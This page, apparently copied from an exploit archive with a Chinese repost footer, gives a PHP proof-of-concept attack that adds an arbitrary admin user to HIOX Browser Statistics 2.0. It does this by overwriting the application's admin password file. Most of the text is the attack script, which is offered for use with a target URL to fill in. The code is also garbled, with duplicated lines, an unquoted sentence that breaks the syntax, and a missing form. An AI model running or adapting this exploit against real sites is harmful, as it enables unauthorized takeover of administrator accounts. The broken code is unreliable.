HIOX Browser Statistics 2.0 Arbitrary Add Admin User Exploit
<?php
@session_start();
?>
@session_start();
?>
<?php /* HIOX Browser Statistics 2.0 Arbitrary Add Admin User Vulnerability [~] Discoverd & exploited by Stack [~]Greeatz All Freaind [~]Special thnx to Str0ke [~] Name Script : HIOX Browser Statistics 2.0 [~] Download : http://www.hscripts.com/scripts/php/downloads/HBS_2_0.zip You need to change http://localhost/path/ with the link of script it's very importent */ $creat = "true"; $iswrite = $_POST['createe']; if($user=="" && $pass==""){ if($iswrite == "creatuser") { $usname = $_POST['usernam']; $passwrd = md5($_POST['pword']); if($usname != "" && $passwrd != ""){ $filee = "http://localhost/path/admin/passwo.php"; $file1 = file($filee); $file = fopen($filee,'w'); fwrite($file, "<?php \n"); fwrite($file, "$"); fwrite($file, "user=\"$usname\";\n"); fwrite($file, "$"); fwrite($file, "pass=\"$passwrd\";"); fwrite($file, "\n?>"); fclose($file); $creat = "false"; echo " New User Created ";Please Wait You will be Redirected to Login Page } else{ echo " Enter correct Username or Password ";} } if($creat == "true"){ ?>
<?php } }else{ echo " User Already Exist ";} ?> |
版权声明
本文仅代表作者观点,不代表本站立场。
本文系作者授权发表,未经许可,不得转载。
本文地址:/websafe/Exploit/149288.html
